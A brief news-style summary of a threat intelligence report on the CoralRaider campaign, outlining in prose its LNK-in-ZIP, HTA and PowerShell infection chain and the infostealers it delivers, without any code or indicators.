TLDR:
- CoralRaider hacker identified in a new campaign targeting multiple countries
- Evades antivirus detection using malicious LNK file embedded in a ZIP file
In a recent cybersecurity article, the CoralRaider hacker has been identified in a new campaign targeting multiple countries, including the U.S., Nigeria, Germany, Egypt, the U.K., Poland, the Philippines, Norway, and Japan. This threat actor utilizes a multi-stage infection chain, starting with a victim opening a malicious shortcut embedded inside a ZIP file. The shortcut file contains an embedded PowerShell command that runs a malicious HTA file on the Attacker-controlled CDN domain.
The HTA file executes an embedded JavaScript, which decodes and runs a PowerShell decryptor script, decrypting another embedded PowerShell Loader script that runs on the victim’s machine’s memory. The loader script evades detections and bypasses User Access Control (UAC) while downloading and running infostealer malware such as Cryptbot, LummaC2, or Rhadamanthys.
The campaign also uses Living-off-the-land binary techniques, with the loader script downloading a payload and saving it in a specific folder to avoid detection. The campaign’s selection of payload includes Cryptbot, LummaC2, and Rhadamanthys, each with their own methods of harvesting sensitive information from infected machines. The article also includes indicators of compromise such as SHA-256 hashes, file names, API calls, and IP addresses associated with the campaign.
Overall, this article highlights the sophisticated tactics used by the CoralRaider hacker to evade antivirus detections and steal sensitive information from victims in various countries.